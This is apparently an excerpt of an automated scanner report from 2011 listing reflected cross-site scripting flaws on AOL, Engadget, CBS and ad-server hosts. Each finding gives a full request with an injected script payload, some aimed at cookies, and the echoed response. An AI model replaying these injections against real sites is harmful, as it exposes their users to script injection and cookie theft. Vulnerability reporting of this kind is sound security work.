GET /2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?fe6d6"-alert(1)-"cc4365a87c2=1 HTTP/1.1 Host: green.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... green.autoblog.com"; s_265.mmxgo = true; s_265.prop1="Autoblog"; s_265.prop2="Post"; s_265.prop12="http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?fe6d6"-alert(1)-"cc4365a87c2=1"; s_265.prop16="Video: How apartment dwellers can charge their electric vehicles — Autoblog Green"; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop9="bsd:19829683";
var s_code=s ...[SNIP]...
1.113. http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45b2f"><script>alert(1)</script>bb0719d741c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?45b2f"><script>alert(1)</script>bb0719d741c=1 HTTP/1.1 Host: green.autoblog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <link rel="canonical" href="http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?45b2f"><script>alert(1)</script>bb0719d741c=1"/> ...[SNIP]...
1.114. http://help.aol.com/help/product/aim [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://help.aol.com
Path:
/help/product/aim
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d38f"><script>alert(1)</script>58a51860742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /help/product/aim?1d38f"><script>alert(1)</script>58a51860742=1 HTTP/1.1 Host: help.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script type ...[SNIP]... <TextArea name="1d38f"><script>alert(1)</script>58a51860742" style="display:none;visibility:hide"> ...[SNIP]...
1.115. http://help.aol.com/help/product/aim/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://help.aol.com
Path:
/help/product/aim/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15650"><script>alert(1)</script>bae15fcead9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /help/product/aim/?15650"><script>alert(1)</script>bae15fcead9=1 HTTP/1.1 Host: help.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script type ...[SNIP]... <TextArea name="15650"><script>alert(1)</script>bae15fcead9" style="display:none;visibility:hide"> ...[SNIP]...
1.116. http://japanese.engadget.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://japanese.engadget.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e744"-alert(1)-"5dc6583bede was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?1e744"-alert(1)-"5dc6583bede=1 HTTP/1.1 Host: japanese.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload c0c31<script>alert(1)</script>91610088e03 was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=85&ct=MACNN_HOMEPAGE_AND_ROSc0c31<script>alert(1)</script>91610088e03&tr=ELECTRONISTA&num=7&layt=templatebottom&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 20:37:04 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Sun, 06 Feb 2011 20:37:04 GMT Content-Type: application/x-javascript Content-Length: 93
// Error: Unknown old section MACNN_HOMEPAGE_AND_ROSc0c31<script>alert(1)</script>91610088e03
1.118. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jlinks.industrybrains.com
Path:
/jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 11208<script>alert(1)</script>01e1e582feb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=85&ct=MACNN_HOMEPAGE_AND_ROS&tr=ELECTRONISTA&num=7&layt=templatebottom&fmt=simp&11208<script>alert(1)</script>01e1e582feb=1 HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 20:37:07 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Sun, 06 Feb 2011 20:37:07 GMT Content-Type: application/x-javascript Content-Length: 69
The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload aec99<script>alert(1)</script>9252672da8b was submitted in the tr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=85&ct=MACNN_HOMEPAGE_AND_ROS&tr=ELECTRONISTAaec99<script>alert(1)</script>9252672da8b&num=7&layt=templatebottom&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 20:37:04 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Sun, 06 Feb 2011 20:37:04 GMT Content-Type: application/x-javascript Content-Length: 86
// Error: Site 85 has no section ELECTRONISTAaec99<script>alert(1)</script>9252672da8b
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 6e2a8<script>alert(1)</script>5664779b5a2 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 06 Feb 2011 20:19:22 GMT Cache-Control: max-age=86400, private Expires: Mon, 07 Feb 2011 20:19:22 GMT X-Proc-ms: 0 Content-Type: application/javascript;charset=ISO-8859-1 Date: Sun, 06 Feb 2011 20:19:21 GMT Content-Length: 128
/* * JavaScript include error: * The customer code "J055326E2A8<SCRIPT>ALERT(1)</SCRIPT>5664779B5A2" was not recognized. */
1.121. http://kr.engadget.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://kr.engadget.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db35a"-alert(1)-"5ea201beed3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?db35a"-alert(1)-"5ea201beed3=1 HTTP/1.1 Host: kr.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa475<script>alert(1)</script>947c52ed946 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /learn.jsaa475<script>alert(1)</script>947c52ed946?namespace=bgsmth&partial=db8be26461d3c04c280076f8a2511da299dbe425&callback=learn_cb HTTP/1.1 Host: learn2.aol.com Proxy-Connection: keep-alive Referer: http://www.gadling.com/?d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.1 404 Not Found Content-Type: text/plain ntCoent-Length: 145 X-Response-Time: 0ms Date: Sun, 06 Feb 2011 20:41:46 GMT Connection: keep-alive Content-Length: 145
Cannot GET /learn.jsaa475<script>alert(1)</script>947c52ed946?namespace=bgsmth&partial=db8be26461d3c04c280076f8a2511da299dbe425&callback=learn_cb
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 96580<script>alert(1)</script>baa2a9fd9f7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /learn.js?namespace=bgsmth&partial=db8be26461d3c04c280076f8a2511da299dbe425&callback=learn_cb96580<script>alert(1)</script>baa2a9fd9f7 HTTP/1.1 Host: learn2.aol.com Proxy-Connection: keep-alive Referer: http://www.gadling.com/?d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload 3cf3a<a>c5232a83a81 was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=803cf3a<a>c5232a83a81&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=803cf3a<a>c5232a83a81&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='803352328381' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PARTNER-ID='1' DVAR_ ...[SNIP]...
The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload fc4eb<a>1f38f7daa6b was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=72427910&ADREQ&beacon=1fc4eb<a>1f38f7daa6b&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1413876' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw9.cnet.com::1566353728 2 ...[SNIP]...
The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa822'%3balert(1)//7c0ff5d4906 was submitted in the BRAND parameter. This input was echoed as fa822';alert(1)//7c0ff5d4906 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57fa822'%3balert(1)//7c0ff5d4906&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:34:49 GMT Server: Apache/2.2 Content-Length: 1176 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:34:49 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57fa822'%3balert(1)//7c0ff5d4906&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE ...[SNIP]... <img alt="" height="0" src="http://adlog.com.com/adlog/i/r=15150&sg=1815&o=19650%253a19806%253a&h=cn&p=2&b=57fa822';alert(1)//7c0ff5d4906&l=en_US&site=164&pt=6711&nd=19806&pid=&cid=&pp=100&e=&rqid=00c13-ad-e6:4D4EFAF8CFEA5&orh=cbs.com&ort=&oepartner=&epartner=&ppartner=&pdom=ww ...[SNIP]...
The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 6afe3<a>ee014234579 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=576afe3<a>ee014234579&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=576afe3<a>ee014234579&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAP ...[SNIP]...
The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload 26971*/alert(1)//df28e5b63e6 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=5726971*/alert(1)//df28e5b63e6&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:34:51 GMT Server: Apache/2.2 Content-Length: 1175 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:34:51 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=5726971*/alert(1)//df28e5b63e6&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 35ae0<a>44ed3893763 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js35ae0<a>44ed3893763&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js35ae0<a>44ed3893763&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" - ...[SNIP]...
The value of the DVAR_GENRE request parameter is copied into a JavaScript inline comment. The payload 4b426*/alert(1)//1050a777b41 was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy4b426*/alert(1)//1050a777b41&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:35:17 GMT Server: Apache/2.2 Content-Length: 1189 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Sun, 06 Feb 2011 20:35:17 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy4b426*/alert(1)//1050a777b41&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the DVAR_GENRE request parameter is copied into the HTML document as plain text between tags. The payload 6377c<a>3fffe363d11 was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
